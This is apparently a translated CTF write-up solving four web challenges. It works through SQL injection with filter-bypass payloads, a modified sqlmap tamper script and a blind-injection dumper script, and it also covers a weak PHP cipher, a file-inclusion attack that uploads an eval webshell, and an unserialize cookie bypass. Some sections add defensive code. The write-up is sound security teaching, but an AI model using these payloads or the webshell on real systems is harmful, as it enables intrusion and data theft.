多次 (Many Times)

Challenge:
This challenge has 2 flags.
Both flags are lowercase.
Flag format: flag{}

Solution:
Opening the challenge redirects to http://123.206.87.240:9004/1ndex.php?id=1. Changing the id to 5 makes the page print "You can do some SQL injection in here.", so this is SQL injection; let's test it.
Add a single quote:
http://123.206.87.240:9004/1ndex.php?id=5%27
The page returns "error", so the SQL statement presumably failed.
Try appending a # comment:
http://123.206.87.240:9004/1ndex.php?id=5%27%23
The page is normal again.
Then try:
http://123.206.87.240:9004/1ndex.php?id=5%27%20or%201=1%23
This errors, so some keyword is probably being filtered.
Next, run a script to see which keywords are filtered:
# -*- coding:utf-8 -*-
import requests

# Each candidate keyword is substituted into the length('%s') probe; a response whose
# length differs from the baseline (430 bytes on this target) marks the keyword as affected
# by the filter.
sql = "http://123.206.87.240:9004/1ndex.php?id=1'^(length('%s')!=0)^'"
txt = "from|into|load_file|0x|outfile|by|substr|base|echo|hex|mid|like|char|union|or|select|greatest|%00|_|\'|admin|limit|=_| |in|<|>|-|user|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep"
arr = txt.split('|')
for i in arr:
    response = requests.get(sql % i)
    if len(response.text) != 430:
        print(i)

The keyword list in the script can be set as you like (mine is not complete). Running it shows the following are filtered:
or
union
select
and
Then try to bypass it; testing shows that doubling or as oorr gets through:
http://123.206.87.240:9004/1ndex.php?id=5%27%20oorr%201=1%23
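The filter enumeration above and the oorr bypass show the same weakness: a blocklist that deletes each keyword once. The following Python is an added example, not code from the writeup or from the challenge: it models such a single-pass filter against a constructed SQLite table (the table, its rows and the two lookup functions are assumptions), shows the doubled keyword collapsing back into the blocked word, and puts a parameterized, type-checked lookup beside the string-concatenated one so that the input never becomes part of the SQL text.

```python
import re
import sqlite3

# Keywords the writeup found blocked on the challenge server.
BLOCKED = ("union", "select", "and", "or")


def single_pass_filter(value):
    """Model of a blocklist that deletes each keyword once, case-insensitively.

    Deleting a keyword once is not the same as deleting it until none remains:
    removing "or" from "oorr" leaves "or" behind, which is exactly why the
    doubled keyword survived the challenge's filter.
    """
    for kw in BLOCKED:
        value = re.sub(re.escape(kw), "", value, flags=re.IGNORECASE)
    return value


def iterated_filter(value):
    """Delete keywords until a full pass changes nothing (still only a blocklist)."""
    while True:
        filtered = single_pass_filter(value)
        if filtered == value:
            return value
        value = filtered


def make_db():
    """Constructed sample database standing in for the challenge's table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "first"), (2, "second"), (3, "third")])
    return conn


def lookup_concat(conn, raw_id):
    """Vulnerable pattern: filter the value, then splice it into the SQL text."""
    sql = "SELECT title FROM news WHERE id = '%s'" % single_pass_filter(raw_id)
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, raw_id):
    """Hardened pattern: validate the type, then bind the value as a parameter.

    No blocklist is involved: the value never reaches the SQL text, so spelling
    tricks such as "oorr" have nothing to bypass.
    """
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a positive integer")
    rows = conn.execute("SELECT title FROM news WHERE id = ?", (int(raw_id),))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print(single_pass_filter("oorr"), "|", iterated_filter("oorr"))
    print(lookup_concat(db, "1"), lookup_param(db, "1"))
```

Even the iterated filter is only a patch on the wrong design: it still lets the request shape the query, and any keyword missing from the list (or any alternative syntax the database accepts) goes straight through. Binding parameters fixes the class of bug rather than one spelling of it.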
Let's run sqlmap. The double-write tamper that ships with sqlmap has some problems, so we modified it; the code is as follows:
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import random
import re

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def tamper(payload, **kwargs):
    """
    Replaces predefined SQL keywords with representations
    suitable for replacement (e.g. .replace("SELECT", "")) filters

    Notes:
        * Useful to bypass very weak custom filters

    >>> random.seed(0)
    >>> tamper('1 UNION SELECT 2--')
    '1 UNIOUNIONN SELESELECTCT 2--'
    """

    keywords = ("UNION", "SELECT", "OR", "AND")
    retVal = payload

    warnMsg = "currently only a couple of keywords are being processed %s. " % str(keywords)
    warnMsg += "You can set it manually according to your needs"
    singleTimeWarnMessage(warnMsg)

    if payload:
        for keyword in keywords:
            # split the keyword at a random position and insert a full copy there
            _ = random.randint(1, len(keyword) - 1)
            # original sqlmap line (word-boundary match), kept for reference
            #retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal)
            retVal = re.sub(r"%s" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal)
        print(retVal)

    return retVal

The tuple keywords = ("UNION", "SELECT", "OR", "AND") can be extended with your own keywords. Then run:
python ./sqlmap.py -r 1.txt --tamper c-shuangxie.py --current-db

1.txt is the captured request and c-shuangxie.py is our modified double-write tamper script. Running this gives the database name web1002-1.
Continue with:
python ./sqlmap.py -r 1.txt --tamper c-shuangxie.py -D web1002-1 --tables
This gives the tables flag1 and hint.
python ./sqlmap.py -r 1.txt --tamper c-shuangxie.py -D web1002-1 -T flag1 --dump
Result:
+----------------------+-----------------+
| flag1 | address |
+----------------------+-----------------+
| usOwycTju+FTUUzXosjr | ./Once_More.php |
+----------------------+-----------------+
Visiting Once_More.php, we find another SQL injection page.
This one can be dumped directly with sqlmap:
python sqlmap.py -r 1.txt --tables
python sqlmap.py -r 1.txt -T flag2 --dump
Finally we get flag{Bugku-sql_6s-2i-4t-bug}
Note that the challenge says the flag is all lowercase, so after lowercasing:
flag{bugku-sql_6s-2i-4t-bug}

Second method, manual injection:
http://123.206.87.240:9004/1ndex.php?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,2%23
The result is 2, so there are two columns.
?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,database()%23
Result: web1002-1
Note that information contains or, so it has to be doubled as well:
?id=-1' ununionion seselectlect 1, group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() #
Page result: flag1,hint
?id=-1' ununionion seselectlect 1, group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name='flag1' %23
Page result: flag1,address
?id=-1' ununionion seselectlect 1, group_concat(flag1) from flag1 %23
Result: usOwycTju+FTUUzXosjr
?id=-1' ununionion seselectlect 1, group_concat(address) from flag1 %23
Result: ./Once_More.php

On Once_More.php, error-based injection with updatexml works because the page echoes the database error:
# list tables
http://123.206.87.240:9004/Once_More.php?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),3) %23
# result: Nobody!XPATH syntax error: '~class,flag2~'
# list columns
?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag2'),'~'),3) %23
# result: Nobody!XPATH syntax error: '~flag2,address~'
# read data
?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),3) %23
# result: Nobody!XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'

Or use blind injection:
import requests

a = 0           # length of the database name, filled in by length_schema()
schema = ''     # database name, filled in by schema_name()


def length_schema():
    global a
    for x in range(1, 20):
        url = 'http://123.206.87.240:9004/Once_More.php?id=1%27and%20length(database())=' + str(x) + '%23'
        s = requests.get(url)
        if "Hello" in s.text:
            print('schema_length is :' + str(x))
            a = int(x)
            break


def schema_name():
    global schema
    x = 0
    name = ''
    while x < a:
        x = x + 1
        temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
        for i in temp:
            url = 'http://123.206.87.240:9004/Once_More.php?id=1%27and%20mid(database(),' + str(x) + ',1)=%27' + str(i) + '%27%23'
            s = requests.get(url)
            if "Hello" in s.text:
                name = name + str(i)
    print('schema_name is :' + name)
    schema = name


def dump_all():
    temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
    temp_data = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    for x in range(0, 20):
        table_name = ''
        for y in range(1, 20):
            key = 0
            for i in temp:
                url = ('http://123.206.87.240:9004/Once_More.php?id=1%27and%20ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27'
                       + schema + '%27%20limit%20' + str(x) + ',1),' + str(y) + ',1))=ascii(\'' + str(i) + '\')%23')
                s = requests.get(url)
                if "Hello" in s.text:
                    key = 1
                    table_name = table_name + str(i)
            if key == 0:
                break
        if table_name == '':
            break
        print('one of tables is:' + table_name)
        for p in range(0, 20):
            column_name = ''
            for q in range(1, 20):
                key = 0
                for i in temp:
                    url_columns = ('http://123.206.87.240:9004/Once_More.php?id=1%27and%20ascii(mid((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27'
                                   + schema + '%27%20and%20table_name=%27' + table_name + '%27%20limit%20' + str(p) + ',1),' + str(q) + ',1))=ascii(\'' + str(i) + '\')%23')
                    s = requests.get(url_columns)
                    if "Hello" in s.text:
                        key = 1
                        column_name = column_name + str(i)
                if key == 0:
                    break
            if column_name == '':
                break
            print('a column name of ' + table_name + ' is ' + column_name)
            for y in range(0, 10):
                data = ''
                for z in range(1, 20):
                    key = 0
                    for i in temp_data:
                        url_data = ('http://123.206.87.240:9004/Once_More.php?id=1%27and%20ascii(mid((select%20' + column_name + '%20from%20`' + schema + '`.' + table_name + '%20limit%20'
                                    + str(y) + ',1),' + str(z) + ',1))=ascii(\'' + str(i) + '\')%23')
                        s = requests.get(url_data)
                        if "Hello" in s.text:
                            data = data + str(i)
                            key = 1
                    if key == 0:
                        break
                if data == '':
                    break
                print('one data of ' + schema + '.' + table_name + '\'s ' + column_name + ' is ' + data)


def main():
    length_schema()
    schema_name()
    dump_all()


if __name__ == '__main__':
    main()

PHP_encrypt_1(ISCCCTF)
Challenge:
fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=
There is an attachment with the following source:
<?php
function encrypt($data,$key)
{
    $key = md5('ISCC');
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    for ($i=0; $i < $len; $i++) {
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    for ($i=0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str);
}
?>

Solution:
This is a crypto challenge and should not be in the web category. Solving code:
<?php
function encrypt($data,$key)
{
    $key = md5('ISCC');
    $x = 0;
    $len = strlen($data);
    $klen = strlen($key);
    $char = '';
    $str = '';
    for ($i=0; $i < $len; $i++) {
        if ($x == $klen)
        {
            $x = 0;
        }
        $char .= $key[$x];
        $x+=1;
    }
    for ($i=0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
    }
    return base64_encode($str);
}

$s = 'fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=';
$s = base64_decode($s);
$len = strlen($s);
$key = md5('ISCC');
$x = 0;
$klen = strlen($key);
// rebuild the same repeating keystream the encrypt() loop produces
$char = '';
for ($i=0; $i < $len; $i++) {
    if ($x == $klen)
    {
        $x = 0;
    }
    $char .= $key[$x];
    $x+=1;
}
// invert the addition mod 128: subtract the key byte, wrapping around when negative
for ($i=0; $i < $len; $i++) {
    $r = 0;
    if(ord($s[$i])-ord($char[$i])<0){
        $r = ord($s[$i]) + 128 - ord($char[$i]);
    }else{
        $r = ord($s[$i])-ord($char[$i]);
    }
    echo chr($r);
}
?>

Running it prints:
Flag:{asdqwdfasfdawfefqwdqwdadwqadawd}
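The challenge cipher is a repeating-key additive cipher: every plaintext byte has one character of md5('ISCC') added to it modulo 128, and the key is fixed in the source, so anyone holding the source can invert it. The Python below is an added example, not the writeup's code: it ports encrypt() and adds the matching decrypt(); KEY, keystream() and the ASCII range check are mine, the ciphertext is the one from the challenge.

```python
import base64
import hashlib

# Key the challenge source hard-codes: md5('ISCC'), 32 lowercase hex characters.
KEY = hashlib.md5(b"ISCC").hexdigest()

# Ciphertext given in the challenge.
CIPHERTEXT_B64 = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA="


def keystream(length, key=KEY):
    """Repeat the key to cover `length` characters (the $char string in the PHP)."""
    return (key * (length // len(key) + 1))[:length]


def encrypt(plaintext, key=KEY):
    """Port of the challenge's encrypt(): add key bytes mod 128, then base64.

    The PHP works on single bytes, so only ASCII plaintext (< 128) round-trips;
    anything else is rejected rather than silently corrupted.
    """
    if any(ord(ch) > 127 for ch in plaintext):
        raise ValueError("plaintext must be ASCII for the mod-128 scheme to be invertible")
    ks = keystream(len(plaintext), key)
    raw = bytes((ord(p) + ord(k)) % 128 for p, k in zip(plaintext, ks))
    return base64.b64encode(raw).decode("ascii")


def decrypt(ciphertext_b64, key=KEY):
    """Inverse: subtract the same key byte mod 128.

    Python's % already returns a non-negative result, so the explicit
    "+ 128 when negative" branch of the PHP solution is not needed here.
    """
    raw = base64.b64decode(ciphertext_b64)
    ks = keystream(len(raw), key)
    return "".join(chr((c - ord(k)) % 128) for c, k in zip(raw, ks))


if __name__ == "__main__":
    print(decrypt(CIPHERTEXT_B64))
```

Because the key is a constant derived from a public string and the operation is a plain addition, this construction gives no confidentiality at all; the only thing that separates it from a Vigenère cipher is the hex alphabet of the key.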
文件包含2 (File Inclusion 2)

Challenge:
http://123.206.31.85:49166/
Flag format: SKCTF{xxxxxxxxxxxxxxxx}
Hint: file inclusion

Solution:
After opening, the address is http://123.206.31.85:49166/index.php?file=hello.php. The file=hello.php parameter suggests a file inclusion vulnerability. Viewing the page source reveals a hint pointing to upload.php, which allows image uploads. Combined with the file inclusion, we can upload a one-line webshell under an image extension.
Upload a shell.jpg containing:
<?php echo 1111111111; ?>
Visiting the returned file path shows that <?php ?> was replaced, leaving _ echo 1111111111; _
So try the alternative PHP tag syntax (the <script language="php"> form was removed in PHP 7.0, so it only works because the target runs an older PHP):
<script language="php"> @eval($_POST[0]); </script>
After uploading, we get the image address and include it through the file inclusion:
http://123.206.31.85:49166/index.php?file=upload/201910110603238853.jpg
Using HackBar, send the POST request 0=system('ls'); the listing shows the file this_is_th3_F14g_154f65sd4g35f4d6f43.txt, and visiting it gives the flag.
SKCTF{uP104D_1nclud3_426fh8_is_Fun}
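The chain above works because index.php includes whatever file= names, so an uploaded .jpg in upload/ is as includable as hello.php. The Python below is an added example, not the challenge's or the writeup's code, of the two usual server-side fixes: an allowlist mapping page keys to files, and a lexical containment check that keeps include inside one directory and one extension. WEB_ROOT, PAGES_DIR, UPLOAD_DIR and the page names are assumptions; the upload filename is the one the writeup reports.

```python
import os

# Constructed layout standing in for the challenge's web root (hypothetical paths).
WEB_ROOT = "/var/www/html"
PAGES_DIR = os.path.join(WEB_ROOT, "pages")     # the only directory include may read
UPLOAD_DIR = os.path.join(WEB_ROOT, "upload")   # user uploads: never includable

# Option 1: an allowlist mapping short page keys to files (assumed names).
ALLOWED_PAGES = {"hello": "hello.php", "about": "about.php"}


def resolve_by_allowlist(key):
    """Return the path for a known page key, or None for anything else.

    The request never supplies a path at all, so traversal, absolute paths and
    uploaded files are not even expressible.
    """
    filename = ALLOWED_PAGES.get(key)
    return os.path.join(PAGES_DIR, filename) if filename else None


def resolve_by_containment(param):
    """Fallback when a fixed map is impractical: confine the path to PAGES_DIR.

    Rejects embedded NUL bytes (older PHP versions truncated include paths at
    them), absolute paths, anything that is not a .php file, and any ".."
    sequence that lands outside PAGES_DIR, including the upload directory.
    """
    if not param or "\x00" in param:
        return None
    if os.path.isabs(param):
        return None          # os.path.join would discard PAGES_DIR entirely
    candidate = os.path.normpath(os.path.join(PAGES_DIR, param))
    if os.path.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        return None          # escaped PAGES_DIR via ".."
    if not candidate.endswith(".php"):
        return None          # an uploaded .jpg can never be included
    return candidate


if __name__ == "__main__":
    for p in ("hello.php", "../upload/201910110603238853.jpg", "/etc/passwd"):
        print(repr(p), "->", resolve_by_containment(p))
```

The allowlist is the stronger of the two and should be preferred; the containment check is the fallback for legacy code, and it still relies on the upload directory sitting outside PAGES_DIR and on uploads never being written with a .php extension.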
flag.php

Challenge:
URL: http://123.206.87.240:8002/flagphp/
Clicking login does nothing?
Hint: hint

Solution:
Following the hint, add the parameter: http://123.206.87.240:8002/flagphp/?hint=1, which reveals the source:
<?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){
show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
<form method="POST" action="#">
<p><input name="user" type="text" placeholder="Username"></p>
<p><input name="password" type="password" placeholder="Password"></p>
<p><input value="Login" type="button"/></p>
</form>
</div>
</body>
</html>
<?php
}
$KEY='ISecer:www.isecer.com';
?>

Look at the check elseif (unserialize($cookie) === "$KEY"):
at the moment this comparison runs, $KEY has not been assigned yet (it is only set at the bottom of the file), so "$KEY" interpolates to the empty string, and unserialize($cookie) therefore has to equal "". Compute the serialized form:
<?php
echo serialize("");
?>
which gives:
s:0:"";
Set document.cookie='ISecer=s:0:"";'
Revisit http://123.206.87.240:8002/flagphp/ to get the flag.
flag{unserialize_by_virink}